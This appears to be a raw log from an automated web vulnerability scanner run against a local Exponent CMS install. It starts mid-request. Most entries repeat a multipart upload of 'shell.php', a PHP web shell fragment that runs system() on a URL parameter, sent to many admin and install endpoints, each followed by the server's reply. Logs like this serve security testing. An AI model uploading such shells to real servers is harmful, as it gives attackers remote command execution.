Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:15 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/toggle_maintenance.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:15 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/trimdatabase.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:15 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/trimdatabase.php?action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:15 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/trimdatabase.php?printerfriendly=shell.php&action=shell.php§ion=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:15 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/trimdatabase_final.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:16 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/umgr_clearpass.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:16 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/umgr_delete.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:16 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/umgr_edit.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:16 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/umgr_edit.php?action=shell.php&ajax_action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:16 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/umgr_editprofile.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:17 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/umgr_lockuser.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:17 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/umgr_membership.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:17 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/umgr_membership.php?action=shell.php§ion=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:17 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/umgr_savemembers.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:17 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/umgr_saveuser.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:18 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/upload_extension.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:18 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/useraccounts.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:18 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/usersessions.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:18 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/usersessions.php?expid=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:19 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/administrationmodule/actions/verify_extension.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:19 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/addressbookmodule/class.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:19 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/addressbookmodule/manifest.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:19 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/addressbookmodule/actions/delete.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:19 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/addressbookmodule/actions/edit.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:20 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/addressbookmodule/actions/edit.php?action=shell.php§ion=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:20 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/addressbookmodule/actions/save.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:20 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/modules/addressbookmodule/actions/view.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:20 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/index.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 302 Found Date: Fri, 08 Oct 2010 22:27:20 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Location: ../index.php Content-Length: 47 Content-Type: text/html This Exponent Site has already been configured. ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/popup.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:21 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=777badeeaec54b9e76b4d88f55aaadbd; expires=Sun, 16-Jan-2011 22:27:21 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 485 Content-Type: text/html Exponent CMS : Install Wizard ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/popup.php?expid=shell.php&ajax_action=shell.php&page=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:21 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=sndkn3ecc4er5h9ebpr1g20ja1; expires=Sun, 16-Jan-2011 22:27:21 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 485 Content-Type: text/html Exponent CMS : Install Wizard ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/popup.php?expid=shell.php&ajax_action=shell.php&printerfriendly=shell.php&action=shell.php§ion=shell.php&page=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:22 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=6g1dho448060hr50ca88v47pq0; expires=Sun, 16-Jan-2011 22:27:22 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 485 Content-Type: text/html Exponent CMS : Install Wizard ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/upgrades/add_gallery_order.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:22 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 168 Content-Type: text/html
Fatal error: Class 'upgradescript' not found in C:\xampp\xampplite\htdocs\exponent\install\upgrades\add_gallery_order.php on line 18
